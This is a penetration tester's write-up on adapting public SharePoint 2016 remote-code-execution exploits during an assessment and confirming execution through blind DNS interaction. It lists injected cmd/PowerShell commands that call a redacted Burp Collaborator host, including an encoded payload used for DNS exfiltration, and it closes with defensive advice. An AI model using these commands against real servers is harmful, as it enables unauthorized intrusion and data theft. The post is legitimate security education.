Sharepoint is generally used as an intranet site, to share news and other internal company information. I’ve encountered it used by SMBs to large companies across industries. From a penetration tester’s point of view, it is another out-of-the-box product, which is not too fancy to test. Why it is not fancy to test? Within the short timeframe of a penetration test, the consultant does not have enough time to delve deeply into the internal mechanics of complex software. This means recreating the installation locally which mimics the real thing and looking for potential vulnerabilities through security research is not efficient. Due to that we will usually focus on misconfiguration and using the public disclosures of other security researchers. Even the use of other security researcher’s work requires that the pentester gathers information about the target and adjusts the publicly known exploits accordingly.
This story started during one of my recent assessments when I was assigned for a test of an on-premise internal Sharepoint 2016 site. Initial enumeration showed that the target runs Sharepoint version 22.214.171.12481. I assumed this based on the response header MicrosoftSharePointTeamServices returned by the application (and you can estimate that version was released somewhere in April 2018). At that point, I started looking for publicly known exploits and research papers. Last year brought some publicly known exploits for Sharepoint. However, my attention was on the following research:
I decided to focus on the above exploits as both of them could allow remote code execution (RCE) on the target. Additionally, both of them were well-written and contained details of where security issues were. These exploits did not work out of the box. That’s why I tried to quickly mimic the encountered version on my own virtual machine and started investigating what was wrong. First, I realized that default rights are different from the ones used on my target. I was able to fix that by finding a user who had the proper kind of permissions.
Then, the next problem showed up. Everything looked right, but the payload was not executed on the target – that meant I did not see any effect of the payload. That one was rather related to the target’s environment rather than the software version. And I assumed that because it worked on my test environment but it didn’t work on the target. How could I overcome that blocker?
At the back of my head, I kept telling myself to make things simpler and divide the problem into smaller ones (divide and conquer). That led me to the situation where I went through the exploit step by step. This way I ensured that I understood the exploit and confirmed that each step worked. Also, I narrowed down the issue to the injected command itself. I needed to find a blind technique that confirmed command execution. Example blind techniques:
- Create a simple text file that is accessible via the web interface
- Time-based commands which lag execution for a specific time
- External DNS interaction (DNS name resolution)
The first two didn’t work. It could be because the application was not installed in a default location, a Web Application Firewall (WAF) was in use, or another unknown reason. However, I got a DNS interaction that tried to resolve the DNS name I provided and that confirmed command execution. It was a big surprise as it was an internal server – conclusion: never assume anything. From that point, I constructed more complex commands which I put into the payload.
To exfiltrate data from the server I used the Collabfiltrator extension for Burp Suite. It allows the exfiltration of data through DNS queries generated to your Burp Collaborator.
Here is the list of OS commands used in the payload (from the simplest to the more complex):
- ("cmd.exe", "/c ping [REDACTED_BURP_COLLABORATOR]/test.html")
- ("cmd.exe", "/c powershell Invoke-RestMethod -Uri https://trustwave. [REDACTED_BURP_COLLABORATOR]/test.html")
- ("cmd.exe", "/c powershell -enc [PAYLOAD_GENERATER_BY_COLLABFILTRATOR]")
I showed how simple things matter from an attacker’s perspective by taking small steps and trying with very simple payloads. However, that also applies to the defensive side. Following security basics like patching, deny by default, and least privilege can do magic. A potential attacker can be slowed down or stopped by these simple `compensating controls`. In the described scenario, implementing deny by default (by blocking traffic to the Internet from `internal only` servers) would have made it harder to confirm code execution. Having a regular patching process would minimize the impact and probability of exploitation even further.
Hopefully, I’ve convinced you that taking simple steps and dividing bigger problems into smaller ones, can take you to the next level as an attacker, as a defender, and maybe it can be used in other areas through analogy. In summary, simple techniques allowed us to confirm and exploit a vulnerability, but doing the basics would prevent exploitation.